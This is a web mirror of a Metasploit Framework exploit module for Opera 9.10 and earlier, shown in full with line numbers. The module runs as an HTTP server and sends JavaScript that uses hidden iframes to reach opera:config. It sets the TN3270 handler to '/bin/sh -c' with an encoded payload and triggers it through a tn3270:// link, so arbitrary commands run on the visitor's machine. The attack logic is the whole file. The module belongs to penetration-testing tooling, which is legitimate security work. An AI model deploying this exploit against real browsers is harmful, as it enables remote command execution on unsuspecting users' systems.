Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/opera_configoverwrite.rb
31204 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  include Msf::Exploit::Remote::BrowserAutopwn

15
  autopwn_info({

16
    ua_name: HttpClients::OPERA,

17
    ua_maxver: '9.10',

18
    os_name: [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],

19
    javascript: true,

20
    rank: ExcellentRanking, # reliable cmd exec, cleans up after itself

21
    vuln_test: nil

22
  })

23


24
  def initialize(info = {})

25
    super(

26
      update_info(

27
        info,

28
        {

29
          'Name' => 'Opera 9 Configuration Overwrite',

30
          'Description' => %q{

31
            Opera web browser in versions <= 9.10 allows unrestricted script

32
            access to its configuration page, opera:config, allowing an

33
            attacker to change settings and potentially execute arbitrary

34
            code.

35
          },

36
          'License' => BSD_LICENSE,

37
          'Author' => [

38
            'egypt', # stolen from mpack

39
          ],

40
          'References' => [

41
            [ 'OSVDB', '66472'],

42
          ],

43
          'Payload' => {

44
            'EXITFUNC' => 'process',

45
            'Space' => 2048,

46
            'DisableNops' => true,

47
            'BadChars' => ' '

48
          },

49
          'Targets' => [

50
            # [ 'Opera < 9.10 Windows',

51
            #	{

52
            #		'Platform' => 'win',

53
            #		'Arch' => ARCH_X86,

54
            #	}

55
            # ],

56
            [

57
              'Opera < 9.10 Unix Cmd',

58
              {

59
                'Platform' => 'unix',

60
                'Arch' => ARCH_CMD

61
              }

62
            ],

63
          ],

64
          # Not sure when this was disclosed but it's been known since at

65
          # least March 5, 2007, since that's the release date on the version

66
          # of mpack I stole this from.

67
          'DisclosureDate' => '2007-03-05',

68
          'DefaultTarget' => 0,

69
          'Notes' => {

70
            'Reliability' => UNKNOWN_RELIABILITY,

71
            'Stability' => UNKNOWN_STABILITY,

72
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

73
          }

74
        }

75
      )

76
    )

77
  end

78


79
  def on_request_uri(cli, request)

80
    print_status("Got request #{request.uri}")

81


82
    case request.uri

83
    when get_resource

84
      print_status("Sending #{name}")

85
      content = '<body><script>'

86
      content << generate_evil_js(cli, request)

87
      content << '</script></body>'

88
      headers = { 'Content-Type' => 'text/html' }

89
    else

90
      print_status("404ing request for #{request.uri}")

91
      send_not_found(cli)

92
      return

93
    end

94
    send_response_html(cli, content, headers)

95


96
    print_status("Done with request #{request.uri}")

97
  end

98


99
  def generate_evil_js(cli, _request)

100
    # There are a bunch of levels of quotes here, so the easiest way to

101
    # make everything line up is to hex escape the command to run

102
    p = regenerate_payload(cli).encoded

103
    send_not_found(cli) && return if !p

104


105
    shellcode = Rex::Text.to_hex(p, '%')

106
    <<~ENDJS

107
      blank_iframe = document.createElement('iframe');

108
      blank_iframe.src = 'about:blank';

109
      blank_iframe.setAttribute('id', 'blank_iframe_window');

110
      blank_iframe.setAttribute('style', 'display:none');

111
      document.body.appendChild(blank_iframe);

112
      blank_iframe_window.eval(

113
        "config_iframe = document.createElement('iframe');" +

114
        "config_iframe.setAttribute('id', 'config_iframe_window');" +

115
        "config_iframe.src = 'opera:config';" +

116
        "document.body.appendChild(config_iframe);" +

117
        "cache_iframe = document.createElement('iframe');" +

118
        "cache_iframe.src = 'opera:cache';" +

119
        "cache_iframe.onload = function ()" +

120
        "{" +

121
        "	config_iframe_window.eval" +

122
        "	(\\"" +

123
        "	old_handler = opera.getPreference('Network','TN3270 App');" +

124
        "	old_pref    = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +

125
        "	shellcode = '#{shellcode}';" +

126
        "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +

127
        "	opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +

128
        "	app_link = document.createElement('a');" +

129
        "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5..9))}');" +

130
        "	app_link.click();" +

131
        "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +

132
        "	setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +

133
        "	\\");" +

134
        "};" +

135
        "document.body.appendChild(cache_iframe);" +

136
      "");

137
    ENDJS

138
  end

139
end

140


141